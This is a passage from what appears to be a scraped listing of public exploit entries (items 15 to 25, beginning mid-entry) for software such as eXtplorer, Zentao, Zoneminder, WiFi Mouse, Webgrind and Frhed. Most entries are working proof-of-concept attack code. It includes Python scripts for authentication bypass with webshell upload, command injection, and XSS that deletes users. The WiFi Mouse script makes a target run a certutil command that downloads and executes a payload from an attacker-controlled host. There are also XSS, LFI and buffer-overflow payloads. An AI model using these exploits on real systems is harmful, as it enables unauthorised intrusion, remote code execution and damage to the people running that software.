      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:
      ```
      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """

      servermedicontservice    servermedicontservice    C:\Program Files (x86)\medicont3\servermedicontservice.exe    Auto
      ```

      # Service info:
      ```
      C:\>sc qc "servermedicontservice"
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: servermedicontservice
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START  (DELAYED)
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files (x86)\medicont3\servermedicontservice.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : servermedicontservice
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem
      ```

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  15. # Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
      # Discovery by: Luis Martinez
      # Discovery Date: 2022-10-05
      # Vendor Homepage: https://www.sysax.com/
      # Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
      # Tested Version: 6.95
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: Windows 10 Pro x64 es

      # Steps to Produce the Crash:
      # 1.- Run python code: Sysax_Multi_Server_6.95.py
      # 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
      # 3.- Open "Sysax Multi Server"
      # 4.- Manage Server Settings...
      # 5.- Administrative Settings -> Configure...
      # 6.- Click "Enable web based administration and API access"
      # 7.- Login -> admin
      # 8.- Paste ClipBoard on "Password"
      # 9.- Save
      # 10.- Crashed

      ```python
      #!/usr/bin/env python
      buffer = "\x41" * 800
      f = open ("Sysax_Multi_Server_6.95.txt", "w")
      f.write(buffer)
      f.close()
      ```
  16. # Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
      # Date: 2020-09-24
      # Exploit Author: Sinem Şahin
      # Vendor Homepage: https://flatcore.org/
      # Version: 2.1.1
      # Tested on: Windows & XAMPP

      ==> Tutorial <==
      1- Go to the following url. => http://(HOST)/install/index.php
      2- Write XSS Payload into the username of the user account.
      3- Press "Save" button.

      XSS Payload ==> "<script>alert("usernameXSS")</script>
  17. # Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) # Exploit Author: ErPaciocco # Author Website: https://erpaciocco.github.io # Vendor Homepage: https://extplorer.net/ # # Vendor: # ============== # extplorer.net # # Product: # ================== # eXtplorer <= v2.1.14 # # eXtplorer is a PHP and Javascript-based File Manager, it allows to browse # directories, edit, copy, move, delete, # search, upload and download files, create & extract archives, create new # files and directories, change file # permissions (chmod) and more. It is often used as FTP extension for popular # applications like Joomla. # # Vulnerability Type: # ====================== # Authentication Bypass (& Remote Command Execution) # # # Vulnerability Details: # ===================== # # eXtplorer authentication mechanism allows an attacker # to login into the Admin Panel without knowing the password # of the victim, but only its username. This vector is exploited # by not supplying password in POST request. # # # Tested on Windows # # # Reproduction steps: # ================== # # 1) Navigate to Login Panel # 2) Intercept authentication POST request to /index.php # 3) Remove 'password' field # 4) Send it and enjoy! # # # Exploit code(s): # =============== # # Run below PY script from CLI... 
# # [eXtplorer_auth_bypass.py] # # Proof Of Concept try: import requests except: print(f"ERROR: RUN: pip install requests") exit() import sys import time import urllib.parse import re import random import string import socket import time import base64 TARGET = None WORDLIST = None _BUILTIN_WL = [ 'root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator' ] _HOST = None _PATH = None _SESSION = None _HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } def detect(): global _HOST global _PATH global _SESSION global _HEADERS _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') _SESSION = requests.Session() raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) if raw.status_code == 200: ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) if int(ver[0][2]) < 15: return True return False def auth_bypass(): global _HOST global _PATH global _SESSION global _HEADERS global WORDLIST global _BUILTIN_WL _HEADERS['X-Requested-With'] = 'XMLHttpRequest' params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang':'english'} if WORDLIST != None: if WORDLIST == _BUILTIN_WL: info(f"Attempting to guess an username from builtin wordlist") wl = _BUILTIN_WL else: info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") with open(WORDLIST[0], "r") as f: wl = f.read().split('\n') for user in wl: params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': user, 'lang':'english'} info(f"Trying with {user}") res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, 
verify=False) if "successful" in res.text: return (user) else: res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return ('admin') return False def rce(): global _HOST global _PATH global _SESSION global _HEADERS global _PAYLOAD tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] info(f"CSRF Token obtained: {token}") payload = editPayload() info(f"Payload edited to fit local parameters") params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}", 'requestType': 'xmlhttprequest', 'confirm':'true', 'token': token} name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) files = {'userfile[0]':(f"{name}.php", payload)} req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) if "successful" in req.text: info(f"File {name}.php uploaded in root dir") info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") def attack(): if not TARGET: error("TARGET needed") if TARGET: if not detect(): error("eXtplorer vulnerable instance not found!") exit(1) else: info("eXtplorer endpoint is vulnerable!") username = auth_bypass() if username: info("Auth bypassed!") rce() else: error("Username 'admin' not found") def error(message): print(f"[E] {message}") def info(message): print(f"[I] {message}") def editPayload(): # You can generate payload with msfvenom and paste below base64 encoded result # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64 return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") def help(): print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb] Options: -t Target host. Provide target IP address (and optionally port). 
-w Wordlist for user enumeration and authentication (Optional) -wb Use built-in wordlist for user enumeration (Optional) -h Show this help menu. """) return True args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), "h" : (0, lambda *x: (help() and exit(0)))} if __name__ == "__main__": i = 1 [ args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) for arg in [k for k in sys.argv[i:] ] if arg[0] == '-' ] attack() else: help() # /////////////////////////////////////////////////////////////////////// # [Script examples] # # # c:\>python eXtplorer_auth_bypass.py -t https://target.com # c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt # c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb # Exploitation Method: # ====================== # Remote # [+] Disclaimer # The information contained within this advisory is supplied "as-is" with no # warranties or guarantees of fitness of use or otherwise. # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and # that due credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit # is given to the author. The author is not responsible for any misuse of the # information contained herein and accepts no responsibility # for any damage caused by the use or misuse of this information.
  18. # Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) # Exploit Author: mister0xf # Date: 2022-10-8 # Software Link: https://github.com/easysoft/zentaopms # Version: tested on 17.0 (probably works also on newer/older versions) # Tested On: Kali Linux 2022.2 # Exploit Tested Using: Python 3.10.4 # Vulnerability Description: # Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code: # /module/repo/model.php: # [...] # $client = $this->post->client; // <-- client is taken from the POST request # [...] # elseif($scm == 'Git') # { # if(!is_dir($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); # return false; # } # # if(!chdir($path)) # { # if(!is_executable($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); # return false; # } # dao::$errors['path'] = $this->lang->repo->error->path; # return false; # } # # $command = "$client tag 2>&1"; // <-- command is injected here # exec($command, $output, $result); import requests,sys import hashlib from urllib.parse import urlparse from bs4 import BeautifulSoup def banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ######## ''') def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = 
target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content) if __name__ == '__main__': main()
  19. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. 
(Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>" #Request to login and get the response headers loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession) #Request using response headers to obtain CSRF value 
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log") while True: #XSS Request xssUrl = "http://"+options.ip+"/zm/index.php" xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": 
"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession} xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"} xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData) print("Injecting payload: " + response.text) time.sleep(1)
20. # Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Date: 2022-10-08
# Vendor Homepage: https://www.csphere.eu/
# Version: 2011.4
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
2- Write XSS Payload into the username of the buddy list create.
3- Press "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script>

Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md
21. # Exploit Title: Grafana <=6.2.4 - HTML Injection
# Date: 30-06-2019
# Exploit Author: SimranJeet Singh
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download/6.2.4
# Version: 6.2.4
# CVE : CVE-2019-13068

The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)

Payload used - <img src="[image_URL]"><h1>Hello</h1>
  22. # Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE) # Date: 13-10-2022 # Author: Payal # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.2 # Tested on: Windows 10 Pro Build 21H2 # Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAMfrom time import sleepimport sysimport string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3]except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends 
Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
23. # Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal (path traversal)

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description:

WPN-XM Serverstack for Windows v0.8.6 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello (without php) GET request.

Proof of concept:

To detect:

http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server. Example, In C:\:hello.php with this content:

C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>

To Get hello.php in c:\ :

http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php". And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows - Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

WPN-XM Serverstack for Windows v0.8.6, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
24. # Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://github.com/jokkedk/webgrind/
# Software Link : http://github.com/jokkedk/webgrind/
# Tested Version: 1.1
# Tested on: Windows 10 using XAMPP

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description:

Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allows remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.

Proof of concept:

http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph

And the calc.exe opens.

Note: 0'&calc.exe&', & char is necessary to execute the command.

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Webgrind v1.1 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php, in file parameter.

Proof of concept:

http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E

Response:

...
<title>
webgrind - fileviewer: </title><script>alert(1);</script><title>
</title>
<script type="text/javascript" charset="utf-8">
25. # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://frhed.sourceforge.net/
# Software Link : http://frhed.sourceforge.net/
# Tested Version: 1.6.0
# Tested on: Windows 10

CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119

Buffer overflow controlling the Structured Exception Handler (SEH) records in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument.

Proof of concept:

Open Frhed.exe from command line with a large string in Arguments, more than 494 chars:

File '<Frhed_PATH>\Frhed.exe'
Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'

SEH chain of main thread
Address    SE handler
0018FC8C   41367141
35714134   *** CORRUPT ENTRY ***

0BADF00D   [+] Examining SEH chain
0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten with normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic data after the handler
0BADF00D   ------------------------------

'Targets' =>
  [
    [ '<fill in the OS/app version here>',
      {
        'Ret' => 0x00401ba7, # pop ecx # pop ecx # ret - Frhed.exe (change this value by other without \x00)
        'Offset' => 494
      }
    ],
  ],